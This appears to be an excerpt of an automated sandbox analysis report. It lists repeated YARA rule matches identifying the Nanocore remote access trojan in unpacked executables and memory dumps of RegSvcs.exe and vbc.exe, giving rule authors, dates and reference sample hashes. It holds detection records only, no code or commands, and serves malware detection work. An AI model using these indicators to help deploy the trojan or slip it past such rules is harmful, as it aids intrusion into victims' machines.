Source: 9.2.RegSvcs.exe.398b838.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.398b838.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.d40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.d90000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d90000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.d90000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d90000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.27a23d8.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.27a23d8.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.4784c9f.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.4784c9f.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.4780000.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.4780000.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.6e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.6e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.c90000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.c90000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.478e8a4.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.478e8a4.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.4780000.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.4780000.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.2796198.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2796198.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.27a23d8.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.27a23d8.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.2791340.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2791340.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691355428.0000000002390000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691355428.0000000002390000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691091752.0000000000DA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691091752.0000000000DA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691004471.0000000000C90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691004471.0000000000C90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.690718899.0000000000740000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.690718899.0000000000740000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691135916.0000000000DD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691135916.0000000000DD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691058748.0000000000D40000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691058748.0000000000D40000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691079104.0000000000D90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.691079104.0000000000D90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
